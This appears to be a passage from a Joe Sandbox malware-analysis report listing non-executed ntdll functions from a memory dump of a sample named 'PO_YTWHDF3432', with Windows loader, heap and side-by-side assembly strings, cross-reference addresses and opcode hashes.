                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f02e32cc2201c4eb6132b51937bca427279593f387fceb8d2ada0b7f9b51e68b
                                                                          • Instruction ID: 3e4858551479474bee8b54510cd31b7c24fe5b16cc6d6fd1088f5abc6ab9eb87
                                                                          • Opcode Fuzzy Hash: f02e32cc2201c4eb6132b51937bca427279593f387fceb8d2ada0b7f9b51e68b
                                                                          • Instruction Fuzzy Hash: C6B09B71D015D5C5DA11E764460C717795477D0701F15C161E2074741F4738C1D1F275
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 01962349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          • Opcode ID: 6ada7d81d81743dee8449ab007903f70c246c40dca535b92ac75c1be7415cc6d
                                                                          • Instruction ID: 778f3902257765e22eaf6982954d48c14049986fcb09dbe41a185e3d98bb569c
                                                                          • Opcode Fuzzy Hash: 6ada7d81d81743dee8449ab007903f70c246c40dca535b92ac75c1be7415cc6d
                                                                          • Instruction Fuzzy Hash: 77927D71608342ABE721CF29C880F6BB7ECBB84755F14492DFA98D7290D774E944CB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01918620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Address of the debug info found in the active list., xrefs: 019554AE, 019554FA
                                                                          • 8, xrefs: 019552E3
                                                                          • Critical section address., xrefs: 01955502
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01955543
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0195540A, 01955496, 01955519
                                                                          • Invalid debug info address of this critical section, xrefs: 019554B6
                                                                          • double initialized or corrupted critical section, xrefs: 01955508
                                                                          • undeleted critical section in freed memory, xrefs: 0195542B
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019554CE
                                                                          • Critical section address, xrefs: 01955425, 019554BC, 01955534
                                                                          • corrupted critical section, xrefs: 019554C2
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019554E2
                                                                          • Critical section debug info address, xrefs: 0195541F, 0195552E
                                                                          • Thread identifier, xrefs: 0195553A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          • Opcode ID: f82f2f86ea4dced25c4a7ee465eb5275d82badc6f3a1893dd94ba09084d69b64
                                                                          • Instruction ID: 15f98b16f6e486d4a1715347fff394654a95b4c0feed2d4f2bd4afa907dd96ae
                                                                          • Opcode Fuzzy Hash: f82f2f86ea4dced25c4a7ee465eb5275d82badc6f3a1893dd94ba09084d69b64
                                                                          • Instruction Fuzzy Hash: 0C818FB0A41358EFEB60CF99C884BAEBBB9BB45B14F11411DF908F7241D375AA41CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01952602
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01952624
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019524C0
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019522E4
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01952498
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01952412
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0195261F
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01952409
                                                                          • @, xrefs: 0195259B
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019525EB
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01952506
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          • Opcode ID: bfd07d3699cafc2fec8de52d7a714026eea74f7363fc368ff0e80652619d2152
                                                                          • Instruction ID: 6ac93860277b6d17af8c4cd4335b410e773023f94f84c4ea8321d471e1bf8ff8
                                                                          • Opcode Fuzzy Hash: bfd07d3699cafc2fec8de52d7a714026eea74f7363fc368ff0e80652619d2152
                                                                          • Instruction Fuzzy Hash: EE025EB1D042299BDB61DB54CC80B9AB7B8AB54704F5045EAEB0DB7241EB309FC4CF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01988B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          • Opcode ID: e273adaef166dab9c81dabfd04871b79456e734b9857f91f1b5077210aa01751
                                                                          • Instruction ID: d192130bdcc5f1b1579888285b88b7455b512c8b5ca974165f6209d8bb24ff46
                                                                          • Opcode Fuzzy Hash: e273adaef166dab9c81dabfd04871b79456e734b9857f91f1b5077210aa01751
                                                                          • Instruction Fuzzy Hash: 1951AD715043159BD329EF188884BABBBECBFD4350F54492DEA9DC3285E770D608CBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01990274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          • Opcode ID: 80bacee6f0ac26e6340e90b2157ebe41fed61471711c982477fa831692ba3245
                                                                          • Instruction ID: f9fb4d09f04b5b39339df9ec137e90ada65691e9833fc3cd8b16598a5cc413ac
                                                                          • Opcode Fuzzy Hash: 80bacee6f0ac26e6340e90b2157ebe41fed61471711c982477fa831692ba3245
                                                                          • Instruction Fuzzy Hash: BBD1EA31600682EFDF22DF6CC480AADBBF9FF5A710F098049F5699B612D7349A81CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01968A67
                                                                          • HandleTraces, xrefs: 01968C8F
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01968A3D
                                                                          • VerifierDlls, xrefs: 01968CBD
                                                                          • VerifierDebug, xrefs: 01968CA5
                                                                          • VerifierFlags, xrefs: 01968C50
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01968B8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          • Opcode ID: 6585ebb1a81fc14aed812e3a022f7156e54be042fce74bf451976478f116b774
                                                                          • Instruction ID: 5f0c99ee721562536b6178e75cd85d8cf01373549b8f21f21894e805361bc371
                                                                          • Opcode Fuzzy Hash: 6585ebb1a81fc14aed812e3a022f7156e54be042fce74bf451976478f116b774
                                                                          • Instruction Fuzzy Hash: 93912671A45716AFE721DF68C890F1A77ACABA4714F05481CFA4CAB244C734DD44CBB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01964DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpGenericExceptionFilter, xrefs: 01964DFC
                                                                          • ***Exception thrown within loader***, xrefs: 01964E27
                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01964E38
                                                                          • Execute '.cxr %p' to dump context, xrefs: 01964EB1
                                                                          • LdrpProtectedCopyMemory, xrefs: 01964DF4
                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01964DF5
                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 01964E06
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-2973941816
                                                                          • Opcode ID: 5ad1c229664d3edb5fa21a00d02fb31a925712fc6ac10faad73af6e2f7f6f628
                                                                          • Instruction ID: f1477d8add39cd33b6b03248a1481bd4ca0931fc80b8d8fd078d009861c09cff
                                                                          • Opcode Fuzzy Hash: 5ad1c229664d3edb5fa21a00d02fb31a925712fc6ac10faad73af6e2f7f6f628
                                                                          • Instruction Fuzzy Hash: 2D215B721886017BE72AABEC9CC5D267BACFB81F61F144509F61AE7681C560FF51C231
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          • Opcode ID: ab8497657dad7c47231d0970fb8ae46fe8bc2b75acdff1839d10e17122f605be
                                                                          • Instruction ID: 0e8b6e4c7de22a24ed1ebed24bb114d5c90ae16e1c7b562bd97602f42cd62cc4
                                                                          • Opcode Fuzzy Hash: ab8497657dad7c47231d0970fb8ae46fe8bc2b75acdff1839d10e17122f605be
                                                                          • Instruction Fuzzy Hash: 35A23874A0562A8FDB65DF18CD98BA9BBF5AF46704F1442E9D90DE7290DB309E81CF00
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          • Opcode ID: 24b873727c60a227b3b33f9a7c597a5deded9ddd524f70136e22abc90dac4958
                                                                          • Instruction ID: 1878068fc58c2a15597a097b78c4463fbc220d42a607f462fc950210d033fef7
                                                                          • Opcode Fuzzy Hash: 24b873727c60a227b3b33f9a7c597a5deded9ddd524f70136e22abc90dac4958
                                                                          • Instruction Fuzzy Hash: 59915770F453299BEB75DF28D884BAA7BB5BB90B15F000128E90C7B2C4E7B499C1C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitShimEngine, xrefs: 019399F4, 01939A07, 01939A30
                                                                          • apphelp.dll, xrefs: 018D6496
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01939A11, 01939A3A
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01939A2A
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01939A01
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019399ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          • Opcode ID: ee01ac5e71c4e72d98c96c75668a7051841874b029f31c21d97a27baba83b7df
                                                                          • Instruction ID: 16eb65488f8dc9a4fe79692b87e935bfbab8020e2b573ae80c8440b9e70b6380
                                                                          • Opcode Fuzzy Hash: ee01ac5e71c4e72d98c96c75668a7051841874b029f31c21d97a27baba83b7df
                                                                          • Instruction Fuzzy Hash: 9F51B3712083099FE724DF28D881B9B77E9FB84748F50091DF589D7290E670EA45CB93
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0191C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01958181, 019581F5
                                                                          • LdrpInitializeImportRedirection, xrefs: 01958177, 019581EB
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01958170
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 019581E5
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0191C6C3
                                                                          • LdrpInitializeProcess, xrefs: 0191C6C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          • Opcode ID: 5cdb7b4734d504a91ab44983e6d8922d1eb1ee8a4b00a981a305003bf6be5d74
                                                                          • Instruction ID: 1d96b5272e8c3520118953ad9e8ad3f0b7c5795cb723d2911cf489ac60c04045
                                                                          • Opcode Fuzzy Hash: 5cdb7b4734d504a91ab44983e6d8922d1eb1ee8a4b00a981a305003bf6be5d74
                                                                          • Instruction Fuzzy Hash: 1E3106716443069FC314EF29DC85E2A77A4BFD4B50F04091CFD88AB395E620ED44C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01912674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019521BF
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01952180
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01952178
                                                                          • SXS: %s() passed the empty activation context, xrefs: 01952165
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0195219F
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01952160, 0195219A, 019521BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          • Opcode ID: efe9f47ae190a6cfb5c4992a3ff705527471c6201e7027671193e5caf16554a3
                                                                          • Instruction ID: 980646e2d7b15d031ab52a01aaa9e155de44322fdf9844a18629c4e7e997e601
                                                                          • Opcode Fuzzy Hash: efe9f47ae190a6cfb5c4992a3ff705527471c6201e7027671193e5caf16554a3
                                                                          • Instruction Fuzzy Hash: 3431E636B40219ABE721DB9A9C81F5B7B6CEB94B50F15005DBB0CBB244D270AB40CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0192096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 01922DF0: LdrInitializeThunk.NTDLL ref: 01922DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          • Opcode ID: ebf7f2b7e50862992cad70830c00550dbbfb30598e8ea3774a38df4f4b0fdf23
                                                                          • Instruction ID: 63d59f11a80068d9a35a6176350149259a1dce432dbc1e97982bbd0dc81e9d11
                                                                          • Opcode Fuzzy Hash: ebf7f2b7e50862992cad70830c00550dbbfb30598e8ea3774a38df4f4b0fdf23
                                                                          • Instruction Fuzzy Hash: 6D425B75900715DFEB61CF28C880BAAB7F9BF44314F1445A9E98DEB245E770AA84CF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018F29A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-3126994380
                                                                          • Opcode ID: 00e66d66cb2b6a15c67b7a19d971a2414dd55bbcea1b70cadccd0bc20305a5f3
                                                                          • Instruction ID: 448b697646c9f42d61be3d0f564d2e61d045414567412b6c2b791d5dcfaae068
                                                                          • Opcode Fuzzy Hash: 00e66d66cb2b6a15c67b7a19d971a2414dd55bbcea1b70cadccd0bc20305a5f3
                                                                          • Instruction Fuzzy Hash: 4D92AB71A042499FDB25CF68C4447AEBBF2FF48304F18805DEA59EB392D734AA45CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          • Opcode ID: aeeb45f306ceb22c52dbed351523077503ed484cd5b2c2c07ac4aec89ca2f201
                                                                          • Instruction ID: d89f0633314675999bd4182c7b683ba595b77aca722f4a0e875c3d955c7c41b8
                                                                          • Opcode Fuzzy Hash: aeeb45f306ceb22c52dbed351523077503ed484cd5b2c2c07ac4aec89ca2f201
                                                                          • Instruction Fuzzy Hash: 95C1BF74508386CFD719CF58C088B6AB7E4FF86B08F048869F999CB251E734CA45CB56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01918402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0191855E
                                                                          • LdrpInitializeProcess, xrefs: 01918422
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01918421
                                                                          • @, xrefs: 01918591
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          • Opcode ID: 990fe6e20a223f012b16c5d9a5b51173af45d3e9e9f375ff62a2ae0ce1157690
                                                                          • Instruction ID: fe6505f9fde2c5c0810c744a4121abdd3ba6e92821f23cff53ee46bd61f83217
                                                                          • Opcode Fuzzy Hash: 990fe6e20a223f012b16c5d9a5b51173af45d3e9e9f375ff62a2ae0ce1157690
                                                                          • Instruction Fuzzy Hash: 69918C71548349AFE721DF25CC80EABBAECFB84744F40092EFA88D6155E734DA44DB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0191273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019522B6
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019521D9, 019522B1
                                                                          • SXS: %s() passed the empty activation context, xrefs: 019521DE
                                                                          • .Local, xrefs: 019128D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          • API String ID: 0-1239276146
                                                                          • Opcode ID: 3f639934655d73a322e76b71aada0a093a22db5240d7a042cf7649c68f933f67
                                                                          • Instruction ID: 15d91b9c91ab7cf5d5f9297b0dc9f8b6af6ddca5d404022a8e67786a7af0f9a8
                                                                          • Opcode Fuzzy Hash: 3f639934655d73a322e76b71aada0a093a22db5240d7a042cf7649c68f933f67
                                                                          • Instruction Fuzzy Hash: 45A1BC3590022EDBDB24DF68D984BA9B7B9BF58354F2441E9D90CAB255D7309EC0CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01914AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0195342A
                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01953437
                                                                          • RtlDeactivateActivationContext, xrefs: 01953425, 01953432, 01953451
                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01953456
                                                                          Memory Dump Source
